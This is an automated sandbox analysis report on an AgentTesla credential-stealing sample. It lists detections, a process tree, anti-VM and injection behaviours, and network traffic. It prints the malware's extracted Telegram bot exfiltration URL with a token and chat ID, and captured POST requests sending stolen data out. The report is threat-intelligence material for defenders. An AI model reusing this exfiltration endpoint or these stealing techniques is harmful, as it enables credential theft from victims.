Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PSFBGrvmxy.exe

Overview

General Information

Sample Name:PSFBGrvmxy.exe
Original Sample Name:c4b59f8e80a1289b9202a33da41d7d94.exe
Analysis ID:830847
MD5:c4b59f8e80a1289b9202a33da41d7d94
SHA1:9e50bc56372bd9f6c8cccf4c284bc373fde319f0
SHA256:66d51327bab933eda9d755eb691e584fcb324b04c573d1be50d634c7297134f8
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Creates multiple autostart registry keys
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Encrypted powershell cmdline option found
Uses the Telegram API (likely for C&C communication)
Machine Learning detection for sample
May check the online IP address of the machine
Injects a PE file into a foreign processes
Yara detected Generic Downloader
Machine Learning detection for dropped file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • PSFBGrvmxy.exe (PID: 4916 cmdline: C:\Users\user\Desktop\PSFBGrvmxy.exe MD5: C4B59F8E80A1289B9202A33DA41D7D94)
    • powershell.exe (PID: 4692 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 3176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • PSFBGrvmxy.exe (PID: 5908 cmdline: C:\Users\user\Desktop\PSFBGrvmxy.exe MD5: C4B59F8E80A1289B9202A33DA41D7D94)
  • Vlrvln.exe (PID: 1368 cmdline: "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe" MD5: C4B59F8E80A1289B9202A33DA41D7D94)
    • powershell.exe (PID: 496 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Vlrvln.exe (PID: 5680 cmdline: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe MD5: C4B59F8E80A1289B9202A33DA41D7D94)
    • Vlrvln.exe (PID: 5684 cmdline: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe MD5: C4B59F8E80A1289B9202A33DA41D7D94)
  • kDPmkTm.exe (PID: 6016 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: C4B59F8E80A1289B9202A33DA41D7D94)
    • powershell.exe (PID: 4844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • kDPmkTm.exe (PID: 4192 cmdline: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe MD5: C4B59F8E80A1289B9202A33DA41D7D94)
  • Vlrvln.exe (PID: 1592 cmdline: "C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exe" MD5: C4B59F8E80A1289B9202A33DA41D7D94)
    • powershell.exe (PID: 4664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • kDPmkTm.exe (PID: 4864 cmdline: "C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe" MD5: C4B59F8E80A1289B9202A33DA41D7D94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000F.00000002.578941562.000000000306D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000015.00000002.620853028.0000000002C1C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000000.00000002.395696071.00000000057B0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        00000003.00000002.621406129.0000000002DEC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: PSFBGrvmxy.exe PID: 5908JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 7 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.PSFBGrvmxy.exe.57b0000.4.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              0.3.PSFBGrvmxy.exe.4397550.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Snort Signatures

                Timestamp:192.168.2.4149.154.167.220496974432851779 03/20/23-18:32:31.325548
                SID:2851779
                Source Port:49697
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4149.154.167.220497004432851779 03/20/23-18:33:56.107393
                SID:2851779
                Source Port:49700
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.4149.154.167.220497024432851779 03/20/23-18:34:27.218517
                SID:2851779
                Source Port:49702
                Destination Port:443
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: PSFBGrvmxy.exeReversingLabs: Detection: 66%
                Source: PSFBGrvmxy.exeVirustotal: Detection: 57%Perma Link
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeReversingLabs: Detection: 66%
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeReversingLabs: Detection: 66%
                Machine Learning detection for sample
                Source: PSFBGrvmxy.exeJoe Sandbox ML: detected
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeJoe Sandbox ML: detected
                Source: 15.2.Vlrvln.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage?chat_id=6169364705"}
                Source: kDPmkTm.exe.4192.21.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendMessage"}
                Source: PSFBGrvmxy.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 64.185.227.155:443 -> 192.168.2.4:49696 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49697 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 173.231.16.76:443 -> 192.168.2.4:49698 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49700 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49702 version: TLS 1.2
                Source: PSFBGrvmxy.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdb source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net40/Newtonsoft.Json.pdbSHA256 source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmp

                Networking

                barindex
                Snort IDS alert for network traffic
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49697 -> 149.154.167.220:443
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49700 -> 149.154.167.220:443
                Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49702 -> 149.154.167.220:443
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                May check the online IP address of the machine
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\Desktop\PSFBGrvmxy.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeDNS query: name: api.ipify.org
                Source: C:\Users\user\AppData\Roaming\Xnckpwz\Vlrvln.exeDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 0.2.PSFBGrvmxy.exe.57b0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.3.PSFBGrvmxy.exe.4397550.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.395696071.00000000057B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29b7328c749bHost: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db29826727ee57Host: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: POST /bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8db2971bc1af64dHost: api.telegram.orgContent-Length: 972Expect: 100-continueConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
                Source: Joe Sandbox ViewIP Address: 64.185.227.155 64.185.227.155
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: PSFBGrvmxy.exe, 00000003.00000002.621406129.0000000002E06000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.620853028.0000000002C36000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.000000000362C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/
                Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.000000000362C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCert
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.607404091.0000000003F41000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.639278801.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003322000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertCSRSA4096RootG5.crt0E
                Source: kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrusted
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.000000000362C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/
                Source: PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.000000000362C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002B66000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCert
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.607404091.0000000003F41000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.639278801.00000000049E1000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003322000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                Source: kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrusted
                Source: PSFBGrvmxy.exe, 00000000.00000002.397821893.0000000005E80000.00000004.08000000.00040000.00000000.sdmp, PSFBGrvmxy.exe, 00000000.00000002.391759108.0000000002FA2000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 00000004.00000002.521925204.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.0000000002882000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000007.00000002.592840040.000000000289A000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.574166847.0000000002AE4000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Vlrvln.exe, 0000000A.00000002.600034330.00000000040F6000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 0000000B.00000002.619780636.0000000003337000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
